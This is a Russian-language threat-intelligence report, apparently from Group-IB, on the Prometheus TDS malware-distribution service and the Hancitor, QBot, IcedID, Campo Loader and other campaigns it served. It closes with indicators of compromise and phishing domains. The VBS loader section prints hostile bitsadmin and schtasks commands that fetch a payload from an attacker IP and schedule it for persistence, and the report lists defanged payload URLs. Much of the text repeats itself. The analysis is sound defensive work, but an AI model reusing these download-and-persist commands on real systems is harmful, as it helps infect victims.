05.08.2021
Prometheus TDS
Ключ к успеху для Campo Loader, Hancitor, IcedID и QBot
Виктор Окороков
Ведущий аналитик Group-IB Threat Intelligence
Никита Ростовцев
Аналитик Group-IB Threat Intelligence
Введение
Весной 2021 года Threat Intelligence-аналитики Group-IB обнаружили следы вредоносной кампании загрузчика Hancitor. Исследователей заинтересовал нетипичный паттерн его распространения, который впоследствии был описан командами исследователей Unit 42 и McAfee как новая техника, призванная уберечь документы с вредоносными ссылками и вложениями от внимания веб-сканеров. Однако данные, извлеченные аналитиками Group-IB, указывают на то, что аналогичная схема также используется для распространения таких вредоносных программ, как Campo Loader, IcedID, QBot, SocGholish и Buer Loader.
Эксперты Group-IB выявили по меньшей мере 3 тысячи пользователей, ставших целями разрозненных вредоносных кампаний с использованием идентичной схемы. Анализ списка целей позволил выявить две наиболее активные: первая нацелена на физических лиц в Бельгии, вторая — на компании, корпорации, университеты и правительственные организации в США.
Анализируя кампании по распространению различного вредоносного ПО, эксперты Group-IB пришли к выводу, что они могли проводиться с использованием одного и того же MaaS-решения (Malware-as-a-Service). Это предположение подтвердилось после того, как аналитики Group-IB нашли предложение о продаже сервиса, предназначенного для распространения вредоносных файлов и перенаправления пользователей на фишинговые и вредоносные сайты — Prometheus TDS (Traffic Direction System) — на одной из андеграундных площадок.
Эксперты Group-IB выявили по меньшей мере 3 тысячи пользователей, ставших целями разрозненных вредоносных кампаний с использованием идентичной схемы. Анализ списка целей позволил выявить две наиболее активные: первая нацелена на физических лиц в Бельгии, вторая — на компании, корпорации, университеты и правительственные организации в США.
Анализируя кампании по распространению различного вредоносного ПО, эксперты Group-IB пришли к выводу, что они могли проводиться с использованием одного и того же MaaS-решения (Malware-as-a-Service). Это предположение подтвердилось после того, как аналитики Group-IB нашли предложение о продаже сервиса, предназначенного для распространения вредоносных файлов и перенаправления пользователей на фишинговые и вредоносные сайты — Prometheus TDS (Traffic Direction System) — на одной из андеграундных площадок.
Описание
Prometheus TDS — андеграундный сервис, предоставляющий услуги по распространению вредоносных файлов и перенаправлению посетителей на фишинговые и вредоносные сайты. Данный сервис представляет из себя административную панель Prometheus TDS, в которой злоумышленник настраивает необходимые параметры для кампании: загружает вредоносные файлы, настраивает ограничения по геолокации пользователей, версии браузера и операционной системы.
Чтобы потенциальные жертвы вредоносных кампаний не взаимодействовали с административной панелью напрямую, что чревато раскрытием и блокировкой сервера злоумышленника, Prometheus TDS использует сторонние зараженные сайты, которые выступают в качестве промежуточного звена между административной панелью злоумышленника и пользователем. Важно отметить, что список скомпрометированных сайтов добавляется операторами вредоносных кампаний вручную, путем импорта списка веб-шеллов. На скомпрометированные сайты загружается специальный PHP-файл, названный Prometheus.Backdoor, который собирает и отправляет в административную панель данные о посетителе. После анализа собранных данных административная панель принимает решение о том, отдать пользователю вредоносную нагрузку или перенаправить его на заданный URL-адрес.
Threat Intelligence-аналитики Group-IB смогли извлечь более трех тысяч email-адресов, задействованных на первом этапе вредоносных кампаний с использованием Prometheus TDS — рассылке вредоносных писем. Две наиболее активные кампании, выявленные в результате анализа извлеченных данных, были нацелены на физических лиц в Бельгии (более двух тысяч email-адресов) и правительственные организации, компании и корпорации из различных секторов (финансового, розничной торговли, энергетики и добычи полезных ископаемых, кибербезопасности, здравоохранения, IT, страхования) в США (более 260 email-адресов).
Чтобы потенциальные жертвы вредоносных кампаний не взаимодействовали с административной панелью напрямую, что чревато раскрытием и блокировкой сервера злоумышленника, Prometheus TDS использует сторонние зараженные сайты, которые выступают в качестве промежуточного звена между административной панелью злоумышленника и пользователем. Важно отметить, что список скомпрометированных сайтов добавляется операторами вредоносных кампаний вручную, путем импорта списка веб-шеллов. На скомпрометированные сайты загружается специальный PHP-файл, названный Prometheus.Backdoor, который собирает и отправляет в административную панель данные о посетителе. После анализа собранных данных административная панель принимает решение о том, отдать пользователю вредоносную нагрузку или перенаправить его на заданный URL-адрес.
Threat Intelligence-аналитики Group-IB смогли извлечь более трех тысяч email-адресов, задействованных на первом этапе вредоносных кампаний с использованием Prometheus TDS — рассылке вредоносных писем. Две наиболее активные кампании, выявленные в результате анализа извлеченных данных, были нацелены на физических лиц в Бельгии (более двух тысяч email-адресов) и правительственные организации, компании и корпорации из различных секторов (финансового, розничной торговли, энергетики и добычи полезных ископаемых, кибербезопасности, здравоохранения, IT, страхования) в США (более 260 email-адресов).
Схема атаки с использованием Prometheus TDS
Распространение вредоносного ПО при помощи Prometheus TDS происходит в несколько этапов.
Этап 1
Пользователь получает электронное письмо, содержащее один из следующих элементов:
● HTML-файл, который перенаправляет пользователя на взломанный сайт, на котором установлен Prometheus.Backdoor.
● Ссылка на веб-шелл, который перенаправляет пользователей на заданный URL-адрес, в данном случае — на один из адресов, используемых Prometheus TDS.
● Ссылка на страницу Google Docs, содержащую URL-адрес, с которого происходит редирект на вредоносную ссылку.
Этап 1
Пользователь получает электронное письмо, содержащее один из следующих элементов:
● HTML-файл, который перенаправляет пользователя на взломанный сайт, на котором установлен Prometheus.Backdoor.
● Ссылка на веб-шелл, который перенаправляет пользователей на заданный URL-адрес, в данном случае — на один из адресов, используемых Prometheus TDS.
● Ссылка на страницу Google Docs, содержащую URL-адрес, с которого происходит редирект на вредоносную ссылку.
Примеры страниц Google Docs, использованных Prometheus TDS
Этап 2
Пользователь открывает вложение или переходит по ссылке и перенаправляется на URL-адрес Prometheus.Backdoor. Prometheus.Backdoor собирает доступные данные о посетителе.
Этап 3
Собранные данные отправляются в административную панель Prometheus TDS, которая принимает решение, дать бэкдору команду отдать посетителю вредоносный файл или перенаправить его на заданный URL-адрес.
Пользователь открывает вложение или переходит по ссылке и перенаправляется на URL-адрес Prometheus.Backdoor. Prometheus.Backdoor собирает доступные данные о посетителе.
Этап 3
Собранные данные отправляются в административную панель Prometheus TDS, которая принимает решение, дать бэкдору команду отдать посетителю вредоносный файл или перенаправить его на заданный URL-адрес.
Анализ Prometheus.Backdoor
Вредоносные кампании с использованием Prometheus TDS реализуются с помощью взломанных сайтов, на которые загружается Prometheus.Backdoor. Управление бэкдором ведется через административную панель.
Административная панель Prometheus TDS
Обмен данными между административной панелью и бэкдором происходит в зашифрованном виде. Для этого используется XOR-алгоритм, ключ для которого явно указан в настройках Prometheus.Backdoor вместе с адресом административной панели, через которую злоумышленники управляют бэкдорами на зараженных сайтах.
Фрагмент кода Prometheus.Backdoor, содержащий адрес административной панели, ключ для шифрования передаваемых данных, а также функции для шифрования и расшифрования данных
После того, как пользователь попадает на зараженный сайт, Prometheus.Backdoor собирает базовую информацию о посетителе: его IP-адрес, User-Agent, заголовок Referer, данные о часовом поясе и языке — и направляет эту информацию в административную панель Prometheus.
Фрагмент кода Prometheus.Backdoor, отвечающий за получение часового пояса посетителя
Фрагмент кода Prometheus.Backdoor, показывающий алгоритм формирования запроса к административной панели для передачи данных о посетителе
Если пользователь не будет распознан как бот, то в зависимости от настроек административная панель может отдать команду перенаправить пользователя на заданный URL-адрес или отдать ему вредоносный файл. Файл с полезной нагрузкой отдается с помощью специального JavaScript-кода. Чаще всего вредоносное программное обеспечение содержится в офисных документах Word или Excel, но злоумышленники также используют файлы ZIP и RAR. В некоторых случаях сразу после загрузки файла пользователь может быть перенаправлен на легитимный сайт, и ему будет казаться, что файл был скачан из безопасного источника.
Фрагмент кода Prometheus.Backdoor, показывающий метод раздачи вредоносных файлов
Анализ вредоносных кампаний
Campo Loader
В ходе анализа извлеченных файлов Threat Intelligence-аналитики Group-IB нашли 18 уникальных вредоносных документов, относящихся к вредоносному ПО Campo Loader aka BazaLoader, после загрузки которого пользователь перенаправляется на сайты DocuSign или USPS для отвлечения внимания.
В ходе анализа извлеченных файлов Threat Intelligence-аналитики Group-IB нашли 18 уникальных вредоносных документов, относящихся к вредоносному ПО Campo Loader aka BazaLoader, после загрузки которого пользователь перенаправляется на сайты DocuSign или USPS для отвлечения внимания.
Скриншот документа-приманки из кампании по распространению Campo Loader
Campo Loader распространяется через вредоносные макросы, которые содержатся в офисных документах. После того, как жертва активирует макросы, загрузчик сохраняет, а затем декодирует файл .dll, который выполняется через certutil. После того, как сброшенный .dll-файл исполняется, он выполняет HTTP-запрос к своему C&C-серверу:
Содержимое вредоносного макроса
Сервер обрабатывает входящий запрос и в зависимости от геолокации жертвы — на основе ее IP-адреса — решает, отдать полезную нагрузку или сделать редирект на Yahoo!, GNU или другие ресурсы. Загрузчик получил своё название из-за одноименного пути в HTTP-запросах, которые используются для загрузки вредоносных файлов второго этапа.
Пример редиректа на сайт gnu.org
Если административная панель дает команду отдать полезную нагрузку, то пользователь перенаправляется на ресурс, на котором она хранится, либо получает ее напрямую с С&C-сервера.
Результат запроса, который удовлетворяет требованиям сервера на загрузку файла второго этапа
Было установлено, что Campo Loader в различное время использовался для распространения банкеров TrickBot, Ursnif/Gozi и других.
Административная панель Campo Loader
Hancitor
В ходе наблюдения за Prometheus TDS было выявлено 34 вредоносных документа, относящихся к вредоносному ПО Hancitor, которое является трояном-загрузчиком.
В ходе наблюдения за Prometheus TDS было выявлено 34 вредоносных документа, относящихся к вредоносному ПО Hancitor, которое является трояном-загрузчиком.
Скриншот документа-приманки из кампании по распространению Hancitor
После скачивания вредоносного документа жертва перенаправляется либо на сайт DocuSign, либо на фишинговые сайты, использующие IDN-домены, имитирующие сайты двух американских банков.
Пример фишинговой страницы, на которую перенаправлялся пользователь после скачивания вредоносной нагрузки Hancitor, расположенной на IDN-домене xn--keynvigatorkey-yp8g[.]com (https://urlscan.io/result/108463b8-7c0d-4644-9d2b-52cbca3426f8/)
Один из выявленных файлов (SHA1: 41138f0331c3edb731c9871709cffd01e4ba2d88) был отправлен в фишинговом письме со ссылкой, ведущей на страницу Google Docs. Документ, хранящийся в Google Docs, содержал ссылку hXXps://webworks.nepila[.]com/readies.php. После того, как жертва переходит по ссылке, происходит обращение к Prometheus.Backdoor, после чего сервер на основе собранных данных о системе пользователя решит, отдать полезную нагрузку или нет.
Пример запросов на сайт, содержащий Prometheus.Backdoor, с успешной отдачей вредоносного документа и последующим редиректом на DocuSign
На скриншоте выше видно, что ответ на первый запрос на файл "readies.php" равен 937 битам, а второй равен уже 424 594 битам. Это означает, что сервер устроили настройки устройства жертвы и результатом второго запроса стала загрузка на устройство жертвы закодированного в Base64 файла "0301_343810790.doc". После скачивания файла жертва перенаправляется на сайт docusign.com.
Фрагмент кода Prometheus.Backdoor, показывающий метод раздачи вредоносных файлов
Сохраненный таким образом файл "0301_343810790.doc" представляет собой .doc-файл, содержащий вредоносные макросы. После активации макросов в этом документе происходит сброс и выполнение DLL-файла c:\users\%username%\appdata\local\temp\Static.dll, с использованием rundll32.exe. В результате выполнения этого файла отправляются следующие HTTP-запросы:
● hxxp://api.ipify[.]org/
● hxxp://ementincied[.]com/8/forum.php
● hxxp://mymooney[.]ru/6fwedzs3w3fg.exe
● hxxp://api.ipify[.]org/
● hxxp://ementincied[.]com/8/forum.php
● hxxp://mymooney[.]ru/6fwedzs3w3fg.exe
Загружаемый файл "6fwedzs3w3fg.exe" (SHA1: 7394632d8cfc00c35570d219e49de63076294b6b ) является образцом Ficker Stealer
Аналитики Unit 42 в апреле этого года частично проанализировали эту кампанию. В своем исследовании специалисты также упоминают Ficker Stealer, Cobalt Strike и Send-Safe Spambot.
QBot
Среди распространяемых документов были и те, что загружали банковский троян Qbot.
Среди распространяемых документов были и те, что загружали банковский троян Qbot.
Данные образцы являются файлами-приманками, которые во время исполнения требуют активации макросов. Как только макросы активируются, происходит HTTP-запрос для загрузки DLL-файла с полезной нагрузкой.
Скриншот документа-приманки из кампании по распространению Qbot
Обнаруженные вредоносные документы обращались к следующим URL-адресам :
● https://inpulsion[.]net/ds/0702.gif
● https://aramiglobal[.]com/ds/0502.gif
● https://inpulsion[.]net/ds/0702.gif
● https://aramiglobal[.]com/ds/0502.gif
Содержимое вредоносных макросов
К сожалению, на момент нашего анализа эти файлы уже были недоступны, однако, согласно нашим данным, по таким путям грузится Qbot.
IcedID
Один из вредоносных документов, рассылаемых при помощи Prometheus TDS, распространял банковский троян IcedID aka BokBot.
Один из вредоносных документов, рассылаемых при помощи Prometheus TDS, распространял банковский троян IcedID aka BokBot.
Скриншот документа-приманки из кампании по распространению IcedID
После открытия документа и запуска макросов офисный файл пытается скачать и запустить DLL-файл по URL-адресу hXXp://denazao[.]info/images/1j.djvu, который на момент анализа был недоступен. На VirusTotal был обнаружен схожий офисный документ (https://www.virustotal.com/gui/file/ae93a0e0085bcae5ec9f21cb71df0b7d3a6682fa5c8ac4e763f70884cb7bf5c6/community), который также скачивал полезную нагрузку с URL-адреса hXXp://denazao[.]info/images/1j.djvu. После запуска полезной нагрузки происходит обращение по адресу hXXp://twotimercvac[.]uno/, который был идентифицирован специалистами Group-IB как управляющий сервер IcedID.
Граф связей C2-сервера IcedID
VBS Loader
В ходе анализа были обнаружены три сэмпла неизвестного VBS-загрузчика. После скачивания этих файлов пользователь перенаправляется на сайт USPS. При переходе по вредоносной ссылке Prometheus TDS отдает пользователю на скачивание ZIP-архив, внутри которого находится VBS-скрипт. После запуска этого скрипта скачивается полезная нагрузка в виде еще одного VBS-скрипта средствами bitsadmin. Скачанный файл запускается при помощи Windows Task Scheduler через создание команды, которая запускает VBS-скрипт каждые 30 минут, начиная с 00:00.
В ходе анализа были обнаружены три сэмпла неизвестного VBS-загрузчика. После скачивания этих файлов пользователь перенаправляется на сайт USPS. При переходе по вредоносной ссылке Prometheus TDS отдает пользователю на скачивание ZIP-архив, внутри которого находится VBS-скрипт. После запуска этого скрипта скачивается полезная нагрузка в виде еще одного VBS-скрипта средствами bitsadmin. Скачанный файл запускается при помощи Windows Task Scheduler через создание команды, которая запускает VBS-скрипт каждые 30 минут, начиная с 00:00.
Фрагмент обфусцированного кода VBS-лоадера, содержащего URL-адрес для скачивания полезной нагрузки
Для скачивания и запуска полезной нагрузки VBS-скрипт исполняет набор специальных команд с использованием bitsadmin и schtasks:
● cmd /k exit | exit & bitsadmin /create EncodingFirm & exit
● cmd /k exit | exit & bitsadmin /addfile EncodingFirm hXXp://155[.]94[.]193[.]10/user/get/ButPrinciple1619186669 C:\Users\<User>\AppData\Local\Temp\DefineKeeps.tmp & exit
● cmd /k exit | exit & bitsadmin /resume EncodingFirm & exit
● cmd /k exit | exit & schtasks /create /sc minute /mo 30 /tn "Task Update ButPrinciple" /f /st 00:00 /tr C:\Users\<User>\AppData\Local\ButPrinciple\ButPrinciple.vbs & exit
● cmd /k exit | exit & bitsadmin /complete EncodingFirm & exit
● cmd /k exit | exit & bitsadmin /reset & exit
● cmd /k exit | exit & bitsadmin /create EncodingFirm & exit
● cmd /k exit | exit & bitsadmin /addfile EncodingFirm hXXp://155[.]94[.]193[.]10/user/get/ButPrinciple1619186669 C:\Users\<User>\AppData\Local\Temp\DefineKeeps.tmp & exit
● cmd /k exit | exit & bitsadmin /resume EncodingFirm & exit
● cmd /k exit | exit & schtasks /create /sc minute /mo 30 /tn "Task Update ButPrinciple" /f /st 00:00 /tr C:\Users\<User>\AppData\Local\ButPrinciple\ButPrinciple.vbs & exit
● cmd /k exit | exit & bitsadmin /complete EncodingFirm & exit
● cmd /k exit | exit & bitsadmin /reset & exit
На момент анализа на VirusTotal был всего один схожий сэмпл VBS-лоадера, который детектировало только одно антивирусное решение (https://www.virustotal.com/gui/file/a2bd96db3eb0f4e5ab3dd013b0a0ba69c7c84986925623dc31e3b911d963e1b9/details).
Скриншот, показывающий одно срабатывание антивирусного движка на файл sha1 - fcd8674f8df4390d90dad6c31a3dd6f33d6a74de
Buer Loader
Еще одним из распространяемых файлов был архив с названием "document010498(1).zip", который содержал файл "document010498.jnlp". Данный файл во время запуска подгружает полезную нагрузку с домена "secure-doc-viewer[.]com".
К сожалению, на момент анализа данный домен был неактивен. Судя по содержимому файла, он является документом-приманкой для загрузки файлов второго этапа.
Еще одним из распространяемых файлов был архив с названием "document010498(1).zip", который содержал файл "document010498.jnlp". Данный файл во время запуска подгружает полезную нагрузку с домена "secure-doc-viewer[.]com".
К сожалению, на момент анализа данный домен был неактивен. Судя по содержимому файла, он является документом-приманкой для загрузки файлов второго этапа.
Содержимое файла document010498.jnlp
Проанализировав домен "secure-doc-viewer[.]com" с помощью системы графового анализа Group-IB, мы обнаружили, что в WHOIS-записях этого домена указано имя владельца "artem v gushin", с которым связано еще порядка 50 доменов.
Часть связей домена secure-doc-viewer[.]com на основе WHOIS-записей
Среди связанных доменов мы выявили несколько, использующих те же ключевые слова:
● pdfsecure[.]net
● securepdfviewer[.]com
● invoicesecure[.]net
С этими доменами также связаны .jnlp-файлы, например, файл "invoice.jnlp" (SHA1: e3249b46e76b3d94b46d45a38e175ef80b7d0526).
● pdfsecure[.]net
● securepdfviewer[.]com
● invoicesecure[.]net
С этими доменами также связаны .jnlp-файлы, например, файл "invoice.jnlp" (SHA1: e3249b46e76b3d94b46d45a38e175ef80b7d0526).
Содержимое invoice.jnlp
Из нескольких исследований становится ясно, что вышеуказанные домены являются частью кампании по распространению вредоносного ПО Buer Loader.
SocGholish
В ходе анализа URL-адресов взломанных сайтов, используемых в инфраструктуре Prometheus TDS, мы обнаружили, что часть из них перенаправляет пользователя на главную страницу взломанного сайта.
В ходе анализа URL-адресов взломанных сайтов, используемых в инфраструктуре Prometheus TDS, мы обнаружили, что часть из них перенаправляет пользователя на главную страницу взломанного сайта.
URL-адрес Prometheus.Backdoor, перенаправляющий посетителя на главную страницу взломанного сайта
Было обнаружено, что эти сайты используются для распространения вредоносного троянского ПО SocGholish под видом обновлений браузера Google Chrome.
Подгрузка лендинга с фейковыми обновлениями браузера Google Chrome
В то же время SocGholish использует схему выдачи вредоносного файла, которая очень похожа на скрипт, используемый Prometheus TDS. При посещении зараженного сайта пользователь получает страницу с JavaScript-кодом, который содержит в себе закодированный в Base64 ZIP-архив с вредоносным файлом, который будет скачан, если пользователь нажмет кнопку "Обновить браузер".
Фрагмент кода лендинга SocGholish
Для пользователя эта страница выглядит как страница установки обновлений браузера.
Скриншот фейковой страницы с обновлением браузера Chrome
Fake VPN
Помимо распространения вредоносных файлов, Prometheus TDS используется и как классическая TDS для перенаправления пользователей на определенные сайты. Одним из таких сайтов является фейковая страница известного VPN-провайдера, располагавшаяся по адресу hXXps://huvpn[.]com/free-vpn/. При нажатии на кнопку загрузки происходит скачивание вредоносного EXE-файла с адреса hXXps://windscribe.s3.us-east-2.amazonaws[.]com/Windscribe.exe (SHA1: f729b75d68824f200bebe3c3613c478f9d276501).
Помимо распространения вредоносных файлов, Prometheus TDS используется и как классическая TDS для перенаправления пользователей на определенные сайты. Одним из таких сайтов является фейковая страница известного VPN-провайдера, располагавшаяся по адресу hXXps://huvpn[.]com/free-vpn/. При нажатии на кнопку загрузки происходит скачивание вредоносного EXE-файла с адреса hXXps://windscribe.s3.us-east-2.amazonaws[.]com/Windscribe.exe (SHA1: f729b75d68824f200bebe3c3613c478f9d276501).
Скриншот фейковой страницы загрузки Windscribe
Спам-рассылки
Prometheus TDS также перенаправляла пользователей на сайты по продаже фармацевтических товаров. Операторы подобных сайтов зачастую имеют партнерские программы и платят партнерам за приведенных посетителей. Партнеры же, в свою очередь, нередко прибегают к агрессивным спам-кампаниям для увеличения заработка в рамках партнерской программы. В ходе анализа инфраструктуры Prometheus специалисты Group-IB обнаружили ссылки, перенаправлявшие пользователей на сайты фармацевтической компании из Канады.
Prometheus TDS также перенаправляла пользователей на сайты по продаже фармацевтических товаров. Операторы подобных сайтов зачастую имеют партнерские программы и платят партнерам за приведенных посетителей. Партнеры же, в свою очередь, нередко прибегают к агрессивным спам-кампаниям для увеличения заработка в рамках партнерской программы. В ходе анализа инфраструктуры Prometheus специалисты Group-IB обнаружили ссылки, перенаправлявшие пользователей на сайты фармацевтической компании из Канады.
Использование Prometheus TDS для спам-рассылок и редиректа пользователей на заданные сайты
Банковский фишинг
TDS Prometheus использовался также для того, чтобы перенаправлять пользователей на банковский фишинг. К примеру, в ходе кампании, проходившей с марта по май 2021 года, пользователи, перешедшие по ссылке Prometheus.Backdoor, перенаправлялись на поддельные сайты, имитирующие сайт немецкого банка.
TDS Prometheus использовался также для того, чтобы перенаправлять пользователей на банковский фишинг. К примеру, в ходе кампании, проходившей с марта по май 2021 года, пользователи, перешедшие по ссылке Prometheus.Backdoor, перенаправлялись на поддельные сайты, имитирующие сайт немецкого банка.
Пример фишинговой страницы, применявшейся в кампании с использованием Prometheus TDS https://urlscan.io/result/69c84104-f272-4c88-970f-a3131c0580ad/
Предложения о продаже Prometheus TDS на андеграунд-площадках
Приведенный выше анализ описывает несколько не связанных между собой кампаний, которые проводятся различными группами злоумышленников с использованием сервиса Prometheus TDS. Предположив, что Prometheus является MaaS-решением, аналитики Group-IB проанализировали андеграундные площадки в поисках релевантных предложений и нашли профильную тему, начатую пользователем под ником Main.
Prometheus TDS
Скриншот темы о продаже Prometheus TDS
По данным системы Group-IB Threat Intelligence & Attribution, пост с предложением сервиса Prometheus впервые появился в продаже в конце августа 2020 года. По словам владельца сервиса, Prometheus TDS представляет собой антибот-систему редиректов, и ее область применения — рассылка электронных писем, трафик и социальная инженерия. Сервис Prometheus TDS способен проводить валидацию веб-шеллов, создавать и настраивать редиректы, поддерживать работу через прокси, работать с Google-аккаунтами и прочее. Кроме того, система способна осуществлять проверку посетителей среди своего блэклиста. Использование такого блэклиста исключает преждевременное попадание вредоносных ссылок в антивирусные и спам-базы.
Prometheus работает в двух основных режимах:
Стоимость данной системы составляет $250 в месяц.
Prometheus работает в двух основных режимах:
- Перенаправляет пользователя на целевую страницу.
- Выдает файлы для загрузки (DOC, PDF, JS, VBS, EXE).
Стоимость данной системы составляет $250 в месяц.
BRChecker
В ходе исследования и мониторинга инфраструктуры, которая использовалась для размещения админ-панелей Prometheus TDS, исследователи Group-IB обнаружили, что на некоторых хостах, где ранее находилась административная панель Prometheus TDS, появлялась новая панель неизвестного назначения.
Список адресов, на которых в разное время были замечены разные панели:
● 188.130.138[.]63;
● 188.130.138[.]22;
● 188.130.138[.]236;
● 188.130.138[.]61;
● 185.186.142[.]32.
На основе содержимого JS-скриптов этой админ-панели исследователи Group-IB предположили, что перед ними панель другого решения, разработанного Main, — BRCheker.
Список адресов, на которых в разное время были замечены разные панели:
● 188.130.138[.]63;
● 188.130.138[.]22;
● 188.130.138[.]236;
● 188.130.138[.]61;
● 185.186.142[.]32.
На основе содержимого JS-скриптов этой админ-панели исследователи Group-IB предположили, что перед ними панель другого решения, разработанного Main, — BRCheker.
Список скриптов из админ-панели BRChecker
Предложение о продаже системы BRChecker, которая позиционируется как брутер/чеккер email-адресов, впервые было опубликовано пользователем Main в середине июня 2018 года. Согласно описанию разработчика, система работает через модули (worker), которые устанавливаются на арендованные VPS-серверы и управляются через единую админ-панель для последующего брута или проверок пар логин-пароль.
Скриншот объявления о продаже BRCheker
По состоянию на май 2021 года стоимость системы составляла $490.
Скриншот админ-панели BRChecker
Содержимое скриншотов в топике продаж позволило убедиться, что найденная панель — действительно BRChecker.
Индикаторы
Prometheus.Backdoor JavaScript
Prometheus TDS Admin
109.248.11.132
109.248.11.204
109.248.11.67
109.248.203.10
109.248.203.112
109.248.203.168
109.248.203.198
109.248.203.202
109.248.203.207
109.248.203.23
109.248.203.33
185.158.114.121
185.186.142.191
185.186.142.32
185.186.142.59
185.186.142.67
185.186.142.77
188.130.138.130
188.130.138.22
188.130.138.236
188.130.138.57
188.130.138.61
188.130.138.63
188.130.138.70
188.130.139.103
188.130.139.203
188.130.139.228
188.130.139.5
188.130.139.88
46.8.210.13
46.8.210.30
51.15.27.25
62.138.0.68
109.248.11.204
109.248.11.67
109.248.203.10
109.248.203.112
109.248.203.168
109.248.203.198
109.248.203.202
109.248.203.207
109.248.203.23
109.248.203.33
185.158.114.121
185.186.142.191
185.186.142.32
185.186.142.59
185.186.142.67
185.186.142.77
188.130.138.130
188.130.138.22
188.130.138.236
188.130.138.57
188.130.138.61
188.130.138.63
188.130.138.70
188.130.139.103
188.130.139.203
188.130.139.228
188.130.139.5
188.130.139.88
46.8.210.13
46.8.210.30
51.15.27.25
62.138.0.68
Campo Loader
Hancitor
Qbot
IcedID
VBS Loader
Buer Loader
SocGholish
Fake VPN
Спам-рассылки
● hotaiddeal.su
● yourmedsquality.su
● goodherbwebmart.com
● ella.purecaremarket.su
● yourmedsquality.su
● goodherbwebmart.com
● ella.purecaremarket.su
Фишинговые сайты
● banking.sparkasse.de-id1897ajje9021ucn9021345345b0juah10zb1092uhda.xyz
● banking.sparkasse.de-id1897ajjed9021uc421sn9345514ah10zb4351092uhda.xyz
● banking.sparkasse.de-id1877au901501fj82a7fn3a54dx2gsboac8s02bauc248naxx.xyz
● banking.sparkasse.de-id1877au901501fj82a7fnat9bhwhboa8ss02bauc248naxx.xyz
● banking.sparkasse.de-id1877au901501fj82ca7fnas9sbssdfhswahboa802bauc248naxx.xyz
● banking.sparkasse.de-id1877au901501fj82ca7cf2nas9bswsdfhaswhboa802bauc248naxx.xyz
● banking.sparkasse.de-id-19dhjb732ba9nabcz29acb78s21acz19icnba7s.xyz
● banking.sparkasse.de-id1897ajjed9021uc421sn9345514ah10zb4351092uhda.xyz
● banking.sparkasse.de-id1877au901501fj82a7fn3a54dx2gsboac8s02bauc248naxx.xyz
● banking.sparkasse.de-id1877au901501fj82a7fnat9bhwhboa8ss02bauc248naxx.xyz
● banking.sparkasse.de-id1877au901501fj82ca7fnas9sbssdfhswahboa802bauc248naxx.xyz
● banking.sparkasse.de-id1877au901501fj82ca7cf2nas9bswsdfhaswhboa802bauc248naxx.xyz
● banking.sparkasse.de-id-19dhjb732ba9nabcz29acb78s21acz19icnba7s.xyz
Другие сэмплы
BRChecker Admin panel
109.248.11.85
109.248.203.202
109.248.203.50
185.186.142.32
185.212.131.44
188.130.138.16
188.130.138.22
188.130.138.236
188.130.138.61
188.130.138.63
188.130.139.107
188.130.139.158
195.62.53.109
109.248.203.202
109.248.203.50
185.186.142.32
185.212.131.44
188.130.138.16
188.130.138.22
188.130.138.236
188.130.138.61
188.130.138.63
188.130.139.107
188.130.139.158
195.62.53.109
Если материал вам понравился, расскажите о нём друзьям!
Другие интересные статьи:
Узнавайте первыми
о новейших киберугрозах и расследованиях
*Нажимая «Подписаться», вы соглашаетесь на получение новостей компании,
защиту и обработку своих персональных данных в соответствии с ФЗ РФ
защиту и обработку своих персональных данных в соответствии с ФЗ РФ
Предотвращение
Реагирование
Расследование
Продукты
Threat Intelligence & Attribution
Threat Hunting Framework
Fraud Hunting Platform
Digital Risk Protection
Anti-Piracy
Threat Hunting Framework
Fraud Hunting Platform
Digital Risk Protection
Anti-Piracy
Компания
Связаться с нами
Круглосуточная линия +7 495 984-33-64
Электронная почта
info@group-ib.ru
info@group-ib.ru
Адрес офиса
Москва, улица Шарикоподшипниковская, д.1, БЦ «Прогресс Плаза», 9 этаж
Москва, улица Шарикоподшипниковская, д.1, БЦ «Прогресс Плаза», 9 этаж
